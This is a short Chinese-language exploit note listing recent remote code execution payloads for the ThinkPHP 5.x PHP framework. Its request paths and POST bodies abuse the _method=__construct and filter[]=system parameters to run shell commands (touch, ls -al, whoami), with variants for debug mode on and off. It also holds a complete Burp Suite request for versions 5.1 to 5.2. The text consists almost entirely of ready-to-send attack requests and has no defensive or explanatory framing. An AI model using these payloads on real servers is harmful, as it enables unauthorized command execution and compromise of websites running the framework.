#------5.*--------#
最近几天的EXP

#thinkphp# 没有开debug

PATH: 
 /index.php?s=/index/admin

BODY:
 s=touch /tmp/fuck_think_php&_method=__construct&method=&filter[]=system

返回 302，也是成功的

开Debug的
  Body:
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
#----5.1-5.2------# -2019.1.15
-----burpsuite--------
POST /tp4/public/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pgv_pvi=4413691904; pgv_si=s130380800; JSESSIONID=3998323AEC4C54A4375905274B9819D4
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 34

c=system&f=whoami&&_method=filter&